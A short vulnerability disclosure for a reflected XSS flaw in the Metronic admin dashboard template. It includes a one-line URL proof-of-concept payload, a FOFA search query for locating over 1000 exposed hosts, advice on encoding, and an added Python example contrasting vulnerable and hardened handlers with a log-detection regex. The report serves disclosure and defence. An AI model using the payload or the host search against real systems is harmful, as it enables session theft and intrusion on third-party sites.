1、Vulnerable system
Metronic - Responsive Admin Dashboard Template is a responsive website backend management template built on the Bootstrap framework. It has a clean interface, rich features, and full mobile-device responsiveness. Metronic offers a simple, elegant Metro UI style, 6 interface colors, and 76 template pages, including the components a backend management project needs: charts, tables, maps, message centers, monitoring panels, and so on. It is a high-end, feature-complete responsive backend management template. This template has a reflected XSS vulnerability.
2、The system interface built using the Metronic template is as follows:
3、There is a reflected XSS on the homepage
POC: /<svg%20onload=alert(123)>
Vulnerability reproduction: open IP + POC directly in the browser
4、Scope of impact: 1000+ affected systems
Browser access: https://fofa.info/result?qbase64=YXBwPSJNRVRST05JQy1BZG1pbi1UaGVtZSIg
Fofa search: app="METRONIC-Admin-Theme"
5、Examples of affected hosts:
6、Harm:
Reflected XSS (cross-site scripting) is a common web security vulnerability: the attacker places a script in a request (here, in the URL path), the page echoes it back without encoding, and the victim's browser executes it. The main hazards are:
1. Stealing user information: through the injected script an attacker can read sensitive data such as cookies and session tokens and hijack the user's account.
2. Forging requests: an attacker can use the XSS vulnerability to issue requests in the user's name and perform unauthorized operations, such as transferring funds or modifying account information.
To prevent reflected XSS, developers should take the following measures:
- Input validation: strictly validate and filter user input.
- Output encoding: when writing user-controlled input into a webpage, apply the appropriate encoding (for example, HTML encoding).
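The following is an added illustration, not code from this report or from the Metronic project: a hypothetical 404 handler that echoes the decoded request path into the page (the bug class described above), the same handler with the value HTML-encoded as recommended, and a log check that flags request lines carrying the same probe pattern. The handler, the log format and the IP addresses are constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# Constructed request path, identical in shape to the POC in the report.
POC_PATH = "/<svg%20onload=alert(123)>"


def render_404_vulnerable(raw_path: str) -> str:
    """Hypothetical 404 page that reflects the decoded path as raw markup."""
    path = unquote(raw_path)
    return f"<div class='error-title'>Page {path} not found</div>"


def render_404_hardened(raw_path: str) -> str:
    """Same page, but the reflected value is HTML-encoded before insertion,
    so '<' and '>' reach the browser as text rather than as a new element."""
    path = unquote(raw_path)
    return f"<div class='error-title'>Page {html.escape(path, quote=True)} not found</div>"


def reflects_markup(rendered: str, payload_tag: str = "<svg") -> bool:
    """True if the payload survived in the response as live markup."""
    return payload_tag in rendered


# Detection side: flag access-log lines whose request carries an injected
# element or an inline event handler, after percent-decoding the line.
XSS_PROBE = re.compile(
    r"(%3C|<)\s*(svg|script|img|iframe)\b|on(load|error|mouseover)\s*=", re.I
)

# Constructed access-log sample (private IPs, fake timestamps).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /%3Csvg%20onload=alert(123)%3E HTTP/1.1" 404 812',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /?q=<img src=x onerror=alert(1)> HTTP/1.1" 200 6000',
]


def flag_probes(log_lines):
    """Return the log lines that match the reflected-XSS probe pattern."""
    return [line for line in log_lines if XSS_PROBE.search(unquote(line))]


if __name__ == "__main__":
    print("vulnerable reflects markup:", reflects_markup(render_404_vulnerable(POC_PATH)))
    print("hardened reflects markup:  ", reflects_markup(render_404_hardened(POC_PATH)))
    for line in flag_probes(SAMPLE_LOG):
        print("flagged:", line)
```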